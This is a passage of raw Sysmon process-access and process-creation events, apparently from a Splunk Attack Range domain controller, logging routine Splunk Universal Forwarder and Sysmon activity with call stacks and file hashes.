Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F29-6005-EC00-00000000A301}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F29-6005-EC00-00000000A301}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F29-6005-EC00-00000000A301}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8F29-6005-EC00-00000000A301}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F29-6005-ED00-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8F29-6005-ED00-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F29-6005-ED00-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8F29-6005-ED00-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 